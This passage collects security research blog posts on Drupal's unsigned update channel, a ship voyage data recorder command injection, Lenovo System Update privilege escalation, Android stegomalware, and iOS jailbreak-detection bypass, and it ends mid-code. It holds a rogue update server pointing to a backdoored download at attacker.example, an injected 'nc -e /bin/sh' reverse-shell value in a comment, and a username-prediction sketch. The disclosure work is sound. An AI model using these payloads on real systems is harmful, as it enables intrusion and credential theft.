RESEARCH | January 6, 2016

Drupal – Insecure Update Process

Just a few days after installing Drupal v7.39, I noticed there was a security update available: Drupal v7.41. This new version fixes an open redirect in the Drupal core. Even though my Drupal update process had just checked for updates, my local instance claimed everything was up to date:

Issue #1: Whenever the Drupal update process fails, Drupal states that everything is up to date instead of giving a warning.

 

The issue was due to some sort of network problem. Apparently, in Drupal 6 there was a warning message in place, but this is not present in Drupal 7 or Drupal 8.
 
Nevertheless, if the scheduled update process fails, it is always possible to check for the latest updates by using the link that says "Check manually". This link is valuable for an attacker because it can be used to perform a cross-site request forgery (CSRF) attack that forces the admin to check for updates whenever the attacker decides:
 
  • http://yoursite/?q=admin/reports/updates/check
 
Since there is a CSRF vulnerability in the "Check manually" functionality (Drupal 8 is the only version not affected), this could also be used to mount a server-side request forgery (SSRF) attack against drupal.org. Administrators may unwittingly force their servers to request unlimited amounts of information from updates.drupal.org, consuming network bandwidth.
 
Issue #2: An attacker may force an admin to check for updates due to a CSRF vulnerability in the update functionality.
 
An attacker may care about updates because they are sent unencrypted, as the following Wireshark screenshot shows: 

 

 

To exploit unencrypted updates, an attacker must be suitably positioned to eavesdrop on the victim’s network traffic. This scenario typically occurs when a client communicates with the server over an insecure connection, such as public WiFi, or a corporate or home network that is shared with a compromised computer.  
 
The update process downloads a plaintext XML file from http://updates.drupal.org/release-history/drupal/7.x and checks it to see whether the installed version is the latest. This XML document can point to a backdoored version of Drupal.
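To make the attack concrete, here is a minimal sketch of a rogue update server in C. It assumes the attacker is already intercepting traffic to updates.drupal.org (e.g., via ARP or DNS spoofing); the XML field names are approximations of the release-history format rather than a verified copy, and the download URL is illustrative:

#include <arpa/inet.h>
#include <netinet/in.h>
#include <stdio.h>
#include <string.h>
#include <sys/socket.h>
#include <unistd.h>

/* Spoofed release-history document; field names are approximate. */
static const char *xml =
    "<?xml version=\"1.0\"?>\n"
    "<project><short_name>drupal</short_name>\n"
    "  <releases><release>\n"
    "    <name>drupal 7.41 Backdoored</name>\n"
    "    <version>7.41</version>\n"
    "    <download_link>http://attacker.example/drupal-7.41.tar.gz</download_link>\n"
    "  </release></releases></project>\n";

int main(void) {
    int s = socket(AF_INET, SOCK_STREAM, 0), on = 1, c, n;
    char hdr[128];
    struct sockaddr_in addr = { 0 };
    addr.sin_family = AF_INET;
    addr.sin_port = htons(80);          /* plain HTTP; binding here needs root */
    addr.sin_addr.s_addr = INADDR_ANY;
    setsockopt(s, SOL_SOCKET, SO_REUSEADDR, &on, sizeof(on));
    bind(s, (struct sockaddr *)&addr, sizeof(addr));
    listen(s, 5);
    while ((c = accept(s, NULL, NULL)) >= 0) {  /* every request gets the fake XML */
        n = snprintf(hdr, sizeof(hdr),
                     "HTTP/1.1 200 OK\r\nContent-Type: text/xml\r\n"
                     "Content-Length: %zu\r\n\r\n", strlen(xml));
        write(c, hdr, n);
        write(c, xml, strlen(xml));
        close(c);
    }
    return 0;
}

Because Drupal fetches the document over plain HTTP with no signature check, answering every request with the same spoofed XML is enough for a quick demonstration.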

 

  1. The current security update (deliberately named "7.41 Backdoored")
  2. A notice that the security update is required, plus a download link button
  3. The URL of the malicious update that will be downloaded
 
However, updating Drupal is a manual process. Another possible attack vector is to offer a backdoored version of any of the modules installed on Drupal. In the following example, a fake “Additional Help Hint” update is offered to the user:

 

 

Offering fake updates is a simple process. Once requests are being intercepted, a fake update response can be constructed for any module. When administrators click the "Download these updates" button, they start the update process.
 
This is how it looks from an attacker’s perspective before and after upgrading the “Additional Help Hint” module. First it checks for the latest version, and then it downloads the latest (malicious) version available. 


As part of the update, I included a reverse shell from pentestmonkey (http://pentestmonkey.net/tools/web-shells/php-reverse-shell) that will connect back to me, let me interact with the Linux shell, and finally, allow me to retrieve the Drupal database password:


Issue #3: Drupal security updates are transferred unencrypted and without authenticity checks, which could lead to code execution and database access.
 
You may have heard about such things in the past. Kurt Seifried from Linux Magazine wrote an article entitled "Insecure updates are the rule, not the exception" that mentioned that Drupal (among others) was not checking the authenticity of the software being downloaded. Moreover, Drupal itself has had an open discussion about this issue since April 2012 (https://www.drupal.org/node/1538118). This discussion was reopened after I reported the vulnerabilities above to the Drupal Security Team on the 11th of November 2015.
 
For now, you probably want to manually download updates for Drupal and its add-ons. At the time of publication, no fixes are available.
 

TL;DR – It is possible to achieve code execution and obtain the database credentials when performing a man-in-the-middle attack against the Drupal update process. All Drupal versions are affected.

RESEARCH | December 9, 2015

Maritime Security: Hacking into a Voyage Data Recorder (VDR)

In 2014, IOActive disclosed a series of attacks that affect multiple SATCOM devices, some of which are commonly deployed on vessels. Although there is no doubt that maritime assets are valuable targets, we cannot limit the attack surface to those communication devices that vessels, or even large cruise ships, are usually equipped with. In response to this situation, IOActive provides services to evaluate the security posture of the systems and devices that make up the modern integrated bridges and engine rooms found on cargo vessels and cruise ships. [1]

 

There are multiple facilities, devices, and systems located on ports and vessels and in the maritime domain in general, which are crucial to maintaining safe and secure operations across multiple sectors and nations.

 

Port security refers to protecting all of these assets from acts of piracy, terrorism, and other unlawful activities, such as smuggling. Recent activity appears to demonstrate that cyberattacks against this sector may have been underestimated. As threats evolve, procedures and policies must improve to take these new attack scenarios into account. See, for example, https://www.federalregister.gov/articles/2014/12/18/2014-29658/guidance-on-maritime-cybersecurity-standards

 

This blog post describes IOActive’s research related to one type of equipment usually present on vessels: Voyage Data Recorders (VDRs). To understand a little bit more about these devices, I’ll detail some of the internals and vulnerabilities found in one of them, the Furuno VR-3000.

 

What is a Voyage Data Recorder?

A VDR is the equivalent of an aircraft’s ‘black box’ (http://www.imo.org/en/OurWork/Safety/Navigation/Pages/VDR.aspx). These devices record crucial data, such as radar images, position, speed, and audio on the bridge. This data can be used to understand the root cause of an accident.

 

Real Incidents

Several years ago, piracy acts were on the rise. Multiple cases were reported almost every day. As a result, nation-states along with fishing and shipping companies decided to protect their fleet, either by sending in the military or hiring private physical security companies.

On February 15, 2012, two Indian fishermen were shot by Italian marines onboard the merchant vessel Enrica Lexie, who supposedly opened fire thinking they were being attacked by pirates. This incident caused a serious diplomatic conflict between Italy and India, which continues to the present: https://en.wikipedia.org/wiki/Enrica_Lexie_case

 

‘Mysteriously’, the data collected from the sensors and the voice recordings stored in the VDR during the hours of the incident were corrupted, making them totally unusable in the authorities’ investigation. As this story from the Indian Times mentions, the VDR could have provided authorities with crucial clues to figure out what really happened.

 

Curiously, Furuno was the manufacturer of the VDR that was corrupted in this incident. This Kerala High Court document covers that fact: http://indiankanoon.org/doc/187144571/ However, we cannot say whether the model the Enrica Lexie was equipped with was the VR-3000. Just as a side note, the vessel was built in 2008, and the Furuno VR-3000 was apparently released in 2007.

 

Just a few weeks later, on March 1, 2012, the Singapore-flagged cargo ship MV Prabhu Daya was involved in a hit-and-run incident off the Kerala coast. As a result, three fishermen were killed and a fourth went missing; he was eventually rescued by a fishing vessel in the area. Indian authorities initiated an investigation of the accident that led to the arrest of the MV Prabhu Daya’s captain.

During that process, an interesting detail was reported in several Indian newspapers.

http://www.thehindu.com/news/national/tamil-nadu/voyage-data-recorder-of-prabhu-daya-may-have-been-tampered-with/article2982183.ece

 

So, What’s Going on Here?

From a security perspective, it seems clear that VDRs pose a really interesting target. If you either want to spy on a vessel’s activities or destroy sensitive data that may put your crew in a difficult position, VDRs are the key.

 

Understanding a VDR’s internals can provide authorities, or third-parties, with valuable information when performing forensics investigations. However, the ability to precisely alter data can also enable anti-forensics attacks, as described in the real incident previously mentioned.

 

As usual, I didn’t have access to the hardware; but fortunately, I played some tricks and found both firmware and software for the target VDR. The details presented below are exclusively based on static analysis and user-mode QEMU emulation (already explained in a previous blog post). [2]
 
Figure: Typical architecture of a VR-3000

 

Basically, inside the Data Collecting Unit (DCU) is a Linux machine with multiple communication interfaces, such as USB, IEEE1394, and LAN. Also inside the DCU is a backup HDD that partially replicates the data stored on the Data Recording Unit (DRU). The DRU is protected against physical damage in order to survive an accident. It also contains a Flash disk to store data for a 12-hour period. This unit stores all essential navigation and status data, such as bridge conversations, VHF communications, and radar images.

 

The International Maritime Organization (IMO) recommends that all VDR and S-VDR systems installed on or after 1 July 2006 be supplied with an accessible means for extracting the stored data from the VDR or S-VDR to a laptop computer. Manufacturers are required to provide software for extracting data, instructions for extracting data, and cables for connecting between a recording device and computer.

 

The following document provides more detailed information: Furuno VR-3000 LivePlayer Version 4 Operator’s Manual (for Version 2.xx).

After spending some hours reversing the different binaries, it was clear that security is not one of this equipment’s main strengths. Multiple services are prone to buffer overflows and command injection vulnerabilities. The mechanism to update firmware is flawed. Encryption is weak. Basically, almost the entire design should be considered insecure.
 

Take this function, extracted from the Playback software, as an example of how not to perform authentication. For those who are wondering what ‘Encryptor’ is, just one word: Scytale.

 

Digging further into the binary services, we can find a vulnerability that allows unauthenticated attackers with remote access to the VR-3000 to execute arbitrary commands with root privileges. This can be used to fully compromise the device. As a result, remote attackers are able to access, modify, or erase data stored on the VDR, including voice conversations, radar images, and navigation data.

VR-3000’s firmware can be updated with the help of Windows software known as ‘VDR Maintenance Viewer’ (client-side), which is proprietary Furuno software.

 

The VR-3000 firmware (server-side) contains a binary that implements part of the firmware update logic: ‘moduleserv’

 

This service listens on 10110/TCP.

 

Internally, both server (DCU) and client-side (VDR Maintenance Viewer, LivePlayer, etc.) use a proprietary session-oriented, binary protocol. Basically, each packet may contain a chain of ‘data units’, which, according to their type, will contain different kinds of data.

 

Figure: Some of the supported commands
‘moduleserv’ supports several control messages intended to control the firmware upgrade process. Let’s analyze how it handles a ‘SOFTWARE_BACKUP_START’ request:
An attacker-controlled string is used to build a command that will be executed without being properly sanitized. Therefore, this vulnerability allows remote unauthenticated attackers to execute arbitrary commands with root privileges.
Figure: ‘Moduleserv’ v2.54 packet processing
Figure: ‘Moduleserv’ v2.54 unsanitized system call
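Furuno’s actual code is not reproduced here; the following is a minimal, hypothetical C sketch of the unsanitized pattern the disassembly shows, with the handler name and backup command made up for illustration:

#include <stdio.h>
#include <stdlib.h>

/* Hypothetical reconstruction of the vulnerable pattern, not Furuno's code:
 * a string lifted from the SOFTWARE_BACKUP_START packet is pasted into a
 * shell command and executed as root, with no sanitization. */
static void handle_software_backup_start(const char *path_from_packet) {
    char cmd[512];
    snprintf(cmd, sizeof(cmd), "tar cf /mnt/backup.tar %s", path_from_packet);
    system(cmd);  /* a value like "x; nc -e /bin/sh attacker 4444 ;" runs the injected part */
}

int main(int argc, char **argv) {
    handle_software_backup_start(argc > 1 ? argv[1] : "/tmp/data");
    return 0;
}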

 

At this point, attackers could modify arbitrary data stored on the DCU in order to, for example, delete certain conversations from the bridge, delete radar images, or alter speed or position readings. Malicious actors could also use the VDR to spy on a vessel’s crew as VDRs are directly connected to microphones located, at a minimum, in the bridge.

 

However, compromising the DCU is not enough to cover an attacker’s tracks, as it only contains a backup HDD, which is not designed to survive extreme conditions. The key device in this anti-forensics scenario would be the DRU. The privileged position gained by compromising the DCU would allow attackers to modify/delete data in the DRU too, as this unit is directly connected through an IEEE1394 interface. The image below shows the structure of the DRU.
Figure: Internal structure of the DRU

Before IMO’s resolution MSC.233(90) [3], VDRs did not have to comply with security standards to prevent data tampering. Taking into account that we have demonstrated these devices can be successfully attacked, any data collected from them should be carefully evaluated and verified to detect signs of potential tampering.

 

IOActive, following our responsible disclosure policy, notified the CERT/CC about this vulnerability in October 2014. The CERT/CC, working alongside the JPCERT/CC, were in contact with Furuno and were able to reproduce and verify the vulnerability. Furuno committed to providing a patch for their customers “sometime in the year of 2015.” IOActive does not have further details on whether a patch has been made available.
 
References
--------------

RESEARCH | November 25, 2015

Privilege Escalation Vulnerabilities Found in Lenovo System Update

Lenovo released a new version of the Lenovo System Update advisory (https://support.lenovo.com/ar/es/product_security/lsu_privilege) about two new privilege escalation vulnerabilities I had reported to Lenovo a couple of weeks ago (CVE-2015-8109, CVE-2015-8110). IOActive and Lenovo have issued advisories on these issues.
 

Before digging into the details, let’s go over a high-level overview of how the Lenovo System Update pops up the GUI application with Administrator privileges.
 
Here is a discussion of the steps depicted above:


1 – The user starts System Update by running the tvsu.exe binary, which runs TvsuCommandLauncher.exe with a specific argument. Previously, Lenovo fixed vulnerabilities IOActive discovered in which an attacker could impersonate a legitimate caller and pass a command to be executed to the SUService service through named pipes in order to escalate privileges. In the newer version, the argument is a number in the range 1-6 that defines a set of tasks within the DLL TvsuServiceCommon.dll.

 

2 – TvsuCommandLauncher.exe then, as usual, contacts the SUService service that is running with System privileges, to process the required query with higher privileges.

 

3 – The SUService service then launches the UACSdk.exe binary with System privileges to prepare to execute the binary and run the GUI interface with Administrator privileges.

 

4 – UACSdk.exe checks if the user is a normal unprivileged user or a Vista Administrator with the ability to elevate privileges.

 

5 – Depending on user privileges:

 

    • For a Vista Admin user, the user’s privileges are elevated.
    • For an unprivileged user, UACSdk.exe creates a temporary Administrator account with a random password, which is deleted once the application is closed.

The username for the temporary Administrator account follows the pattern tvsu_tmp_xxxxxXXXXX, where each lowercase x is a randomly generated lowercase letter and each uppercase X is a randomly generated uppercase letter. A random, 19-byte password is also generated.


Here is a sample of a randomly created user:    



6 – Through the tvsukernel.exe binary, the main Lenovo System Update GUI application is then run with Administrator privileges.




BUG 1 : Lenovo System Update Help Topics Privilege Escalation
The first vulnerability is within the Help system and has two entry points by which a user can open an online help topic that starts an instance of Internet Explorer.

1 – The link in the main application interface 

 
 

2 – By clicking the Help icon at top right and then clicking Settings
 

 

 

 
Since the main application Tvsukernel.exe runs as Administrator, the web browser instance that opens the Help URL inherits the parent’s Administrator privileges.
From there, an unprivileged attacker has many ways to exploit the web browser instance running under Administrator privileges to elevate his or her own privileges to Administrator or SYSTEM.
BUG 2 : Lenovo System Weak Cryptography Function Privilege Escalation
The second bug is a more technical and exploitable vulnerability in how the temporary administrator account is created under the circumstances described in Step 5b of the overview.
The interesting function for setting the temporary account is sub_402190 and contains the following important snippets of code:
 
 
The function sub_401810 accepts three arguments and is responsible for generating a random string pattern whose length is given by the third argument.
 
Since sub_401810 generates the pattern using rand, the seed is initialized from the sum of the current time and rand values, defined as follows:
 
 
 
Once the seed is defined, the function generates the random value using a loop with RAND and division/multiplication with specific values.
 
Rather than posting the full code, I’ll note that a portion of those loops looks like the following:
 
 
 
The first call to this function is used to generate the 10-letter suffix for the Administrator username that will be created as “tvsu_tmp_xxxxxXXXXX”
 
Since it is based on rand, the algorithm is actually predictable. It is possible for an attacker to regenerate the same username based on the time the account was created.
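As a sketch of the attack idea, an attacker could walk candidate seeds around the account-creation time and regenerate candidate usernames. This is a simplified stand-in seeded from the clock alone; the real sub_401810 mixes in extra rand values and custom arithmetic, so the generator below is illustrative, not Lenovo’s:

#include <stdio.h>
#include <stdlib.h>
#include <time.h>

/* Simplified stand-in for sub_401810: derive a 10-letter suffix from rand(). */
static void gen_suffix(unsigned int seed, char out[11]) {
    srand(seed);
    for (int i = 0; i < 5; i++)  out[i] = 'a' + rand() % 26;  /* xxxxx */
    for (int i = 5; i < 10; i++) out[i] = 'A' + rand() % 26;  /* XXXXX */
    out[10] = '\0';
}

int main(void) {
    char suffix[11];
    time_t now = time(NULL);
    /* Try every seed in a five-minute window around account creation */
    for (time_t t = now - 300; t <= now; t++) {
        gen_suffix((unsigned int)t, suffix);
        printf("candidate: tvsu_tmp_%s\n", suffix);
    }
    return 0;
}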
 
To generate the password (which is more critical), Lenovo has a more secure method: Microsoft Crypto API (Method #1) within the function sub_401BE0. We will not dig into this method, because the vulnerability IOActive discovered is not within this function. Instead, let’s look at how Method #2 generates a password, if Method #1 fails.
 
Let’s return to the snippets of code related to password generation:
 
 
 
We can clearly see that if the function sub_401BE0 fails, the execution flow falls back to the custom rand-based algorithm (defined earlier in function sub_401810) to generate a predictable password for the temporary Administrator account. In other words, an attacker could predict the password created by Method #2.
 

This means an attacker could under certain circumstances predict both the username and password and use them to elevate his or her privileges to Administrator on the machine.
EDITORIAL | October 16, 2015

Five Reasons Why You Should Go To BruCON

BruCON is one of the most important security conferences in Europe. Held each October, the ‘Bru’ in ‘BruCON’ refers to Brussels, the capital of Belgium, where it all started. Nowadays, it’s held in the beautiful city of Ghent, just 55 minutes from its origin. I had the chance to attend this year, and here are the five things that make it a great conference, in my opinion.

You can check out BruCON’s promo video here: https://www.youtube.com/watch?v=ySmCRemtMc4.
1. The conference
Great talks presented by international speakers, ranging from deeply technical material to threat intelligence and other high-level stuff. You might run into people and friends from Vegas or other security conferences.
A circular, well-illuminated stage. You’d better not be caught taking a nap, unless you want a picture of yourself sleeping on the Internet.

(Shyama Rose talking about BASE jumping and risk)

While paid trainings take place two or three days before the conference, free workshops are available to the public during the two-day conference.

(Beau Woods (@beauwoods) giving a cool workshop named:

«Escalating Privileges Through Better Communication»)

While at BruCON, I presented my research on security deficiencies in electroencephalography (EEG) technologies. EEG is a non-invasive method of recording electrical brain activity (synaptic activity between neurons) taken from the scalp. EEG has increasingly been adopted across different industries, and I showed how the technology is prone to common network and application attacks. I demonstrated brain signal sniffing and data tampering through man-in-the-middle attacks, as well as denial-of-service bugs in EEG servers. Client-side applications that analyze EEG data are also prone to application flaws, and I showed how trivial fuzzing can uncover many of them. You can find the related material here: slides, demos (videos) [resource no longer available], and my live talk (video).
2. The city
The medieval architecture in Ghent will enchant you. It’s a really cool city, everywhere you look; full of restaurants, cafes, and of course, pubs. Students of all ages also give the city plenty of vibe. You could easily spend two more days enjoying all Ghent has to offer.
All of this is just around the corner from the venue.
3. The b33r
I’m not a b33r connoisseur, but most of the beers I tasted while in Ghent were, according to my taste, really good. Belgium is regarded as one of the best beer countries in the world, which speaks for itself. In a nice gesture by the conference organizers, speakers were given a single bottle of a hard-to-find beer, Westvleteren 12, which has been rated as “the best beer in the world.” I have no idea how they got them, as the brewer does not produce large amounts of this beer and only sells it to a select few people.
Beer at the venue, beer between talks, and there was even a night where we mixed good beer with ice cream. It was interesting.
4. The venue
The conference is held in the heart of the city, near all the hotels, just two or three blocks from where you’re most likely to stay. The organizers thought out every single detail to help you arrive right on time at the venue.
The main hall is perfect for networking and serves b33r, coffee, and food all day, not only during specific hours.
A renowned hacker DJ dropping some bass and a pianist (a computer scientist who wrote code for Google) took turns making those moments even better.

 

It wouldn’t be a good conference without a Wall of Sheep; it got RickRolled though ;D
(Picture taken by @sehnaoui)
The party venue, just three blocks from the stage, had a good hacker ambience and a good sound atmosphere created by two well-known DJs: @CountNinjula & @KeithMyers.

 

(Picture taken by @wimremes)
5. The old video game consoles
If you’re not interested in a talk, or simply bored, just head upstairs and travel back in time with a whole hall of old consoles. “Here comes a new challenger” requests are accepted…as long as there’s b33r or money involved.

 

 

 
Well, that’s it, another great security conference for you to consider in the future.
Finally, thanks to all this year’s organizers and volunteers. Perhaps you’ll join in next year 😉

 

(Photo taken by @SenseiZeon)
Cheers!

RESEARCH | September 22, 2015

Is Stegomalware in Google Play a Real Threat?

For several decades, the science of steganography has been used to hide malicious code (useful in intrusions) or to create covert channels (useful in information leakage). Nowadays, steganography can be applied to almost any logical/physical medium (format files, images, audio, video, text, protocols, programming languages, file systems, BIOS, etc.). If the steganographic algorithms are well designed, the hidden information is really difficult to detect. Detecting hidden information, malicious or not, is so complex that the study of steganalytic algorithms (detection) has been growing. You can see the growth in scientific publications (source: Google Scholar) and in research investment by governments and institutions.
In fact, since the attacks on September 11, 2001, there has been a lot of discussion on the possibility of terrorists using this technology. See:
 
 
 
 
In this post, I would like to illustrate steganography’s ability to hide data in Android applications. In this experiment, I focus on Android applications published in Google Play, leaving aside alternative markets with lower security measures, where it is easier to introduce malicious code.
 
 
Is it possible to hide information on Google Play or in the Android apps released in it?
 
The answer is easy: YES! Simple techniques have been documented, from hiding malware by renaming the file extension (Android/tr DroidCoupon.A – 2011, Android/tr SmsZombie.A – 2012, Android/tr Gamex.A – 2013) to more sophisticated procedures (AngeCryption – Black Hat Europe, October 2014).
 
Let me show some examples in more depth:
 
 
Google Play Web (https://play.google.com)
 
Google Play includes a webpage for each app with information such as a title, images, and a text description. Each piece of information could conceal data using steganography (linguistic steganography, image steganography, etc.). In fact, I am going to “work” with digital images and demonstrate how Google “works” when there is hidden information inside of files.
 
To do this, I will use two known steganographic techniques: adding information to the end of file (EOF) and hiding information in the least significant bit (LSB) of each pixel of the image.
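As a minimal sketch of the first technique (file names are illustrative), appending bytes after a PNG’s final IEND chunk leaves the image perfectly viewable:

#include <stdio.h>

/* EOF technique: viewers stop rendering at the IEND chunk, so appended
 * bytes ride along invisibly. "cover.png" is an illustrative file name. */
int main(void) {
    FILE *img = fopen("cover.png", "ab");  /* append mode: writes land after IEND */
    if (!img) { perror("cover.png"); return 1; }
    const char secret[] = "hidden message";
    fwrite(secret, 1, sizeof(secret) - 1, img);
    fclose(img);
    return 0;  /* recovery: read everything past IEND, e.g. with a hex editor */
}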
      
 
          PNG Images
 
You can upload PNG images to play.google.com that hide information using EOF or LSB techniques. Google does not remove this information.
 
For example, I created a sample app (automatically generated – https://play.google.com/store/apps/details?id=com.wMyfirstbaskeballgame) and uploaded several images (which you can see on the web) with hidden messages. In one case, I used the OpenStego steganographic tool (http://www.openstego.com/) and in another, I added the information at the end of an image with a hex editor.
 
The results can be seen by performing the following steps (analyzing the current images “released” on the website):
Example 1: PNG with EOF
 
 
Step 2: Look at the end of the file 🙂
Example 2: PNG with LSB
 
 
Step 2: Recover the hidden information using Openstego (key=alfonso)
 
JPEG Images
If you try to upload a steganographic JPEG image (EOF or LSB) to Google Play, the hidden information will be removed. Google reprocesses the image before publishing it. This does not necessarily mean that it is not possible to hide information in this format. In fact, in social networks such as Facebook, we can “avoid” a similar problem with Secret Book or similar browser extensions. I’m working on it…
 
https://chrome.google.com/webstore/detail/secretbook/plglafijddgpenmohgiemalpcfgjjbph?hl=en-GB
 
In summary, based on the previous tests, I can say that Google Play allows information to be hidden in the images of each app. Is this useful? It could be used to exchange hidden information (a covert channel using Google Play). The main question is whether an attacker could use such masked information for some evil purpose. Perhaps they could use images to encode executable code that “will exploit” when you visit the web (using, for example, polyglots + stego exploits), or some other idea. Time will tell…
 
 
 
APK Steganography
 
Applications uploaded to Google Play are not modified by the market. That is, an attacker can use any of the existing resources in an APK to hide information, and Google does not remove that information: machine code (DEX), PNG, JPEG, XML, and so on.
 
 
Could it be useful to hide information on those resources?
 
An attacker might want to conceal malicious code on these resources and hinder automatic detection (static and dynamic analysis) that focuses on the code (DEX). A simple example would be an application that hides a specific phone number in an image (APT?).
 
The app verifies the phone number and, after a few clicks on a specific screen on a mobile phone, checks whether the number is equal to the one stored in the picture. If the numbers match, the app can start leaking information (depending on the permissions granted to the application).
 
I want to demonstrate the potential of Android stegomalware with a PoC. Instead of developing it, I will analyze an active sample that has been on Google Play since June 9, 2014. This stegomalware was developed by researchers at Universidad Carlos III de Madrid, Spain (http://www.uc3m.es). This PoC hides a DEX file (executable code) in an image (resource) of the main app. When the app is running, and the user performs a series of actions, the image recovers the “new” DEX file. This code runs and connects to a URL with a payload (in this case harmless). The “bad” behavior of this application can only be detected if we analyze the resources of the app in detail or simulate the interaction the app used for triggering the connection to the URL.
 
Let me show how this app works (static manual analysis):
Step 1: Download the APK to local storage. This requires a tool, such as an APK downloader extension, or a specific website such as http://apps.evozi.com/apk-downloader/
Step 2. Unzip the APK (es.uc3m.cosec.likeimage.apk)
Step 3. Using the Stegdetect steganalytic tool (https://github.com/abeluck/stegdetect) we can detect hidden information in the image “likeimage.jpg”. The author used the F5 steganographic tool (https://code.google.com/p/f5-steganography/).
 
es.uc3m.cosec.likeimage/res/drawable-hdpi/likeimage.jpg
likeimage.jpg : f5(***)
Step 4. To analyze (reverse engineer) what the app is doing with this image, I use the dex2jar and jd tools.
Step 5. Analyzing the code, we can observe the key used to hide information in the image. We can recover the hidden content to a file (bicho.dex).
java -jar f5.jar x -p cosec -e bicho.dex likeimage.jpg
 
Step 6. Analyzing the new file (bicho.dex), we can observe the connection to http://cosec-uc3m.appspot.com/likeimage for downloading a payload.
 
Step 7. Analyzing the code and payload, we can demonstrate that it is inoffensive.
ZGV4CjAzNQDyUt1DKdvkkcxqN4zxwc7ERfT4LxRA695kAgAAcAAAAHhWNBIAAAAAAAAAANwBAAAKAAAAcAAAAAQAAACYAAAAAgAAAKgAAAAAAAAAAAAAAAMAAADAAAAAAQAAANgAAABsAQAA+AAAACgBAAAwAQAAMwEAAD0BAABRAQAAZQEAAKUBAACyAQAAtQEAALsBAAACAAAAAwAAAAQAAAAHAAAAAQAAAAIAAAAAAAAABwAAAAMAAAAAAAAAAAABAAAAAAAAAAAACAAAAAEAAQAAAAAAAAAAAAEAAAABAAAAAAAAAAYAAAAAAAAAywEAAAAAAAABAAEAAQAAAMEBAAAEAAAAcBACAAAADgACAAEAAAAAAMYBAAADAAAAGgAFABEAAAAGPGluaXQ+AAFMAAhMTUNsYXNzOwASTGphdmEvbGFuZy9PYmplY3Q7ABJMamF2YS9sYW5nL1N0cmluZzsAPk1BTElDSU9VUyBQQVlMT0FEIEZST00gVEhFIE5FVDogVGhpcyBpcyBhIHByb29mIG9mIGNvbmNlcHQuLi4gAAtNQ2xhc3MuamF2YQABVgAEZ2V0UAAEdGhpcwACAAcOAAQABw4AAAABAQCBgAT4AQEBkAIAAAALAAAAAAAAAAEAAAAAAAAAAQAAAAoAAABwAAAAAgAAAAQAAACYAAAAAwAAAAIAAACoAAAABQAAAAMAAADAAAAABgAAAAEAAADYAAAAASAAAAIAAAD4AAAAAiAAAAoAAAAoAQAAAyAAAAIAAADBAQAAACAAAAEAAADLAQAAABAAAAEAAADcAQAA
 
The code that runs the payload:
 
Is Google detecting these “stegomalware”?
 
Well, I don’t have the answer. Clearly, steganalysis science has its limitations, but there are other ways to monitor strange behaviors in each app. Does Google do it? It is difficult to know, especially if we focus on “mutant” applications. Mutant applications are applications whose behavior could easily change. Detection would require continuous monitoring by the market. For example, for a few months I have analyzed a special application, including its different versions and the modifications that have been published, to observe if Google does anything with it. I will show the details:
Step 1. The mutant app is “Holy Quran video and MP3” (tr.com.holy.quran.free.apk). Currently at https://play.google.com/store/apps/details?id=tr.com.holy.quran.free

Step 2. Analyzing the current and previous versions of this app, I discovered connections to specific URLs (image files). Are these truly images? Not all of them.

Step 3. Two URLs that the app connects to are very interesting. In fact, they aren’t images but SQLite databases (with messages in Turkish). This is the trivial steganography technique of simply renaming the file extension. The author changed the content of these files:

Step 4. If we analyze these databases, it is possible to find curious messages. For example, recipes with drugs.

Is Google aware of the information exchanged through its applications? This example does not cease to be a mere curiosity, but such procedures might violate the market’s publication policies for certain applications, or hide more serious things.
 
Figure: Recipes inside the file io.png (SQLite database)

In summary, this small experiment shows that we can hide information on Google Play and Android apps in general. This feature can be used to conceal data or implement specific actions, malicious or not. Only the imagination of an attacker will determine how this feature will be used…


Disclaimer: part of this research is based on previous research by the author at ElevenPaths
RESEARCH | September 15, 2015

The iOS Get out of Jail Free Card

If you have ever been part of a Red Team engagement, you will be familiar with the “Get out of Jail Free Card”. In a nutshell, it’s a signed document giving you permission to perform the activity you were caught doing. In some instances, it’s the difference between walking away and spending the night in a jail cell. You may be saying, “Ok, but what does a Get out of Jail Free Card have to do with iOS applications?”

Well, iOS mobile application assessments usually occur on jailbroken devices, and application developers often implement measures that seek to thwart this activity. The tester often has to come up with clever ways of bypassing detection and breaking free from this restriction, a.k.a. “getting out of jail”. This blog post will walk you through the steps required to identify and bypass frequently recommended detection routines. It is intended for persons who are just getting started in reverse engineering mobile platforms. This is not for the advanced user.

Environment Setup
  • Jailbroken iPhone 4S (iOS 7.xx)
  • Xcode 6.4 (command-line tools)
  • IDA Pro or Hopper
  • Mac OS X
 
Intro to ARM Architecture
Before we get started, let’s cover some very basic groundwork. iOS applications are compiled to native code for the ARM architecture running on your mobile device. The ARM architecture defines sixteen 32-bit general-purpose registers, numbered R0 through R15. The first 13 (R0-R12) are for general-purpose usage, and the last three have special meaning: R13 is denoted the stack pointer (SP), R14 the link register (LR), and R15 the program counter (PC). The link register normally holds the return address during a function call. R0-R3 hold arguments passed to functions, with R0 storing the return value. For the purposes of this post, the most important takeaway is that register R0 holds the return value from a function call. See the references section for additional details on the ARM architecture.
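To make that takeaway concrete, here is a trivial function together with (in a comment) roughly the code a compiler emits for it; the exact instructions vary by compiler and optimization level:

/* On ARM, the caller finds a function's return value in R0. */
int answer(void) {
    return 42;   /* compiles to roughly: MOVS R0, #42 ; BX LR */
}

int main(void) {
    return answer();   /* main's exit status also travels back in R0 */
}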
Detecting the Jailbreak
When a device is jailbroken, a number of artifacts are often left behind. Typical jailbreak detection routines usually involve checking for those artifacts before allowing access to the application. Some of the checks you will often see include checking for:
  • Known file paths
  • Use of non-default ports, such as port 22 (OpenSSH), which is often used to connect to and administer the device
  • Symbolic links to various directories (e.g. /Applications, etc.)
  • Integrity of the sandbox (i.e. a call to fork() should return a negative value in a properly functioning sandbox)

In addition to the above, developers will often seek to prevent us from debugging the process through the use of PT_DENY_ATTACH, which blocks the use of the ptrace() system call (a call used in the debugging of iOS applications). The point is, there are a multitude of ways developers try to thwart our efforts as pen testers. That discussion, however, is beyond the scope of this post. You are encouraged to check out the resources included in the references section. Of the resources listed, The Mobile Application Hacker’s Handbook does a great job covering the topic.

Simple PoC
We begin with bypassing routines that check for known file paths. This approach will lay the foundation for bypassing the other checks later on. To demonstrate this, I wrote a very simple PoC that checks for the existence of some of these files. In the event one is found, the program prints out a message stating the device is jailbroken. In a real-world scenario, the application may perform a number of actions that include, but are not limited to, preventing you from accessing the application entirely or restricting access to parts of the application.
Figure 1: Jailbreak detection PoC
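Since Figure 1 is a screenshot, here is a minimal sketch along the same lines; the exact contents of jbFiles[] in the original PoC are not reproduced, so the paths below are assumptions based on common jailbreak artifacts:

#include <stdio.h>
#include <sys/stat.h>

/* Paths are assumptions: typical artifacts left behind by a jailbreak. */
static const char *jbFiles[] = {
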